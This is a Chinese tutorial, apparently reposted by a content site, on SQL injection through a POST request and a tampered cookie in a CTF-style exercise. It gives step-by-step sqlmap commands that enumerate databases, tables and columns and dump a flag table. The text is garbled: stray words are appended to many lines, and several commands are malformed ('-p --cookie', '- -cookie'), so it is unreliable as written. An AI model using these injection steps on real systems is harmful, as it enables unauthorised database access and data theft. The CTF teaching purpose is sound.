sqlmap的post注入

目录

  1. sqlmap的POST注入
  2. cookie注入暴数据库

 POST注入

1.验证存在注入mysql

正常数据包"cookie:user=user"修改"cookie:user=admin"后都会出现flag参数sql

验证Cookie: user=admin’ and ‘1’=1’报错,回显没有flag,说明这种状况就存在注入数据库

2.复制post另存为1.txt文件cookie

>>这里是修改cookie后进行注入的,那么要结合cookie注入来看post注入的原理,其实两个是要联合进行注入的,互不影响。post

 

cookie注入

 所谓的POST注入是发送POST请就包进行注入,cookie注入是修改cookie信息进行假装身份或者说是做为一个注入点进行渗透spa

1.暴数据库

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  --dbsblog

>>能够看到有四个数据库string

POST文件1.txt这里要写文件位置如:/root/1.txttable

cookie要写成:--cookie="user=admin"class

 --string参数,用来来指定结果为true时页面所包含的字符,不包含这个字符的都会被判断为false:--string=“flag”表示正确时候回显flag这个单词

指定数据库类型:--dbms=mysql

暴数据库:--dbs

2.猜表

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee --tables

 

>>猜出employee数据库下有三个表

对特定的数据库进行猜表:-D  数据库名

猜表:--tables

其它的参数不变

3.表fllaagg中的列

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg --columns

猜列要指定数据库、表:-D  数据库   -T  数据表  

猜列:--columns

4.猜表中的字段

>sqlmap  -r  1.txt  -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg "flag" --dump

 

>>找到包含flag的字段

猜字段要指定数据库、表、内容:-D  数据库  -T  数据表   "内容"

猜字段:--dump

 一样的方法能够查看其它数据库、表的内容,注入点方法也是同样的,这里注入点为cookie修改数据后的数据包。若是自己POST数据包存在注入直接使用post注入,能够不用加cookie注入--cookie“user=admin”相似这样的参数。

相关文章
相关标签/搜索